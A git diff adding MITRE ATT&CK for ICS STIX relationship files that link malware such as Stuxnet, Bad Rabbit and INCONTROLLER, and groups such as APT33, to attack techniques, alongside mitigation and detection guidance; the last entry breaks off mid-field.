diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json new file mode 100644 index 0000000000000000000000000000000000000000..fa53ecae325dad8d43433a999e63d902dff29389 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6b74b035-bc85-4b82-91e3-aceb2c225630", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:30.761Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) ransomware spreads through drive-by attacks where insecure websites are compromised. While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actors infrastructure. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json new file mode 100644 index 0000000000000000000000000000000000000000..2b063bf75f9c556a278a1a766dff43b355835017 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c284ce0-0be2-4164-b686-7c383b246aec.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--76471a1a-c9c7-4b78-a646-5604cd7e0068", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c284ce0-0be2-4164-b686-7c383b246aec", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:56.151Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. 
(Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json new file mode 100644 index 0000000000000000000000000000000000000000..6a7568cb4931618fb8e66b2686053fd63be43521 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b843a98a-0981-4341-9010-ac2667be9d75", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0c4aaf6c-4b72-401f-950b-6d65ceb1267a", + "created": "2022-09-27T15:49:26.908Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:49:26.908Z", + "description": "Monitor asset application logs for information that indicate task parameters have changed.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json new file mode 100644 index 0000000000000000000000000000000000000000..7c504416f282f6fcf3dd36dcae4362fa18163cb4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--8cc41a5f-a1b9-4e71-a0fc-5bf670177701", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c9ed09d-4ce3-4e65-845a-c21dcc5d956f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical commands message to outstations, this could include using radio/cell communication to send messages to a field technician that physically performs the control function.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json new file mode 100644 index 0000000000000000000000000000000000000000..132fcd6bdc9fe23033dc9f26d4db307582e9e7ae --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d305450-d5ca-46fe-8583-36c983dd0a88.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--bd6c1d55-2ec8-451e-a9c5-83f9e6368d0e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d305450-d5ca-46fe-8583-36c983dd0a88", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:43:33.144Z", + "description": "Monitor ICS management protocols for functions that change an asset\u2019s operating mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json new file mode 100644 index 0000000000000000000000000000000000000000..b69a07fed7452dfee7633a653dba56c65fba8d22 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d4f2f88-e176-42c7-8258-52b345045662.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--446995be-f7e4-4d09-9012-3fa218855386", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d4f2f88-e176-42c7-8258-52b345045662", + "created": "2022-09-28T20:29:51.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:08.493Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely send commands to a malicious agent uploaded on Omron PLCs over HTTP or HTTPS.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json new file mode 100644 index 0000000000000000000000000000000000000000..6fc2474ad857aa28c8f34107f6a6599026b422fa --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0d540b53-6a5d-4f56-9dee-47707443b149.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--3e1707d1-792b-4529-92ba-64dbdecdf633", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0d540b53-6a5d-4f56-9dee-47707443b149", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:00:14.208Z", + "description": "Monitor ICS automation network protocols for functions related to reading an operational process state (e.g., \u201cRead\u201d function codes in protocols like DNP3 or Modbus). In some cases, there may be multiple ways to monitor an operational process\u2019 state, one of which is typically used in the operational environment. Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json new file mode 100644 index 0000000000000000000000000000000000000000..7d8f6efc8db343744606b995f944736a69752595 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0df0cb6d-0067-48b2-a33e-495415713ab7.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--82b72886-9aac-4f86-bb29-e0c077cc3f34", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0df0cb6d-0067-48b2-a33e-495415713ab7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.181Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json new file mode 100644 index 0000000000000000000000000000000000000000..43a1af09440e49e4dfe27e9eeaf740e5f589cec0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e275c19-7688-47f8-8cd5-85eaacec465b.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--187cf899-c568-4d19-893f-ba07e72ba4e5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e275c19-7688-47f8-8cd5-85eaacec465b", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:04.450Z", + "description": "Monitor industrial process history data for events that correspond with command message functions, such as setpoint modification or changes to system status for key devices. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json new file mode 100644 index 0000000000000000000000000000000000000000..4d27e2852b64353119c1d33501280624cb0d2849 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1136b512-c87a-4db5-9064-4d49b3873b96", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:09:52.454Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) renames s7otbxdx.dll, a dll responsible for handling communications with a PLC. It replaces this dll file with its own version that allows it to intercept any calls that are made to access the PLC. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json new file mode 100644 index 0000000000000000000000000000000000000000..efaae62d7326479c65c9b2997210332ac4102646 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a44425d5-051b-4687-bd67-26156d532e38", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json new file mode 100644 index 0000000000000000000000000000000000000000..7223064cadbe0293e338d6adb4e403dd79c4a324 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7ff135ab-7a89-4dc7-b21c-9822246eed0e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0eb112f6-c1cb-4843-93f5-f668aa0e9bd8", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Allanite Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/allanite/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:08.649Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized credentials collected through phishing and watering hole attacks. (Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json new file mode 100644 index 0000000000000000000000000000000000000000..40a4a9c2268831fd1f8be141f3120e35bd155cb9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--a97c0772-126c-4632-a1c6-eb243efbda51", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0f18b876-b698-4f70-aa98-50e8b5a7eae2", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Andy Greenburg June 2019", + "description": "Andy Greenburg 2019, June 20 Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount Retrieved. 2020/01/03 ", + "url": "https://www.wired.com/story/iran-hackers-us-phishing-tensions/" + }, + { + "source_name": "Jacqueline O'Leary et al. September 2017", + "description": "Jacqueline O'Leary et al. 2017, September 20 Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware Retrieved. 2019/12/02 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:41:49.943Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) sent spear phishing emails containing links to HTML application files, which were embedded with malicious code. (Citation: Jacqueline O'Leary et al. September 2017) [APT33](https://attack.mitre.org/groups/G0064) has conducted targeted spear phishing campaigns against U.S. government agencies and private sector companies. 
(Citation: Andy Greenburg June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json new file mode 100644 index 0000000000000000000000000000000000000000..3637bb10733669329566ca8906a76f99853a3f2e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ddc7ecab-bedc-4620-a9f5-0602cb6eccb5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0f8a6c14-1050-404a-bb6e-4fe107d5b6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.197Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json new file mode 100644 index 0000000000000000000000000000000000000000..fc85ee9462963fecf8f2f064ba00120be28ab78a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--865a3da6-f6f2-4e58-b7c8-3624b7563072", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Ensure proper network segmentation between higher level corporate resources and the control process environment.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json new file mode 100644 index 0000000000000000000000000000000000000000..6a89c4dabb01a9cdc9aa926ad9778ef68768eda9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e6d88503-cddd-4191-8f43-e6857fa66b4c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.137Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json new file mode 100644 index 0000000000000000000000000000000000000000..d4d5c925ce264be713178bba34e7df9debf6b4b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--10626671-941d-4a82-a835-56059058ef87.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--a563d843-f2ad-4cf0-ae33-12465503f7ed", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--10626671-941d-4a82-a835-56059058ef87", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": 